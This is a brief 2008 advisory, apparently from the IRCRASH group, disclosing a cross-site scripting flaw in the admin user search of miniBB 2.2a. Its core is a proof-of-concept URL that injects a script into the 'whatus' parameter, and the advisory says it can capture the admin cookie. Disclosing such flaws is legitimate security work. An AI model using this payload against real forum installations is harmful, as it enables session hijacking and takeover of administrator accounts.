miniBB "whatus" Cross-Site Scripting Vulnerability :: 2008-04-29
##################################################################################### #### Minibb 2.2a #### #### XSS Vulnerability #### ##################################################################################### # # #AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) # #IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ##################################################################################### # # #Script Download : http://www.minibb.net/ # # # ##################################################################################### # < XSS > # #XSS Address : http://example/bb_admin.php?action=searchusers2&whatus="; /> <script>alert(document.cookie)</script>&searchus=id # # # You Can Get Admin Cookie With This Vuln .... # # # ##################################################################################### # Site : Http://IRCRASH.COM # #####################################TNX GOD#########################################Download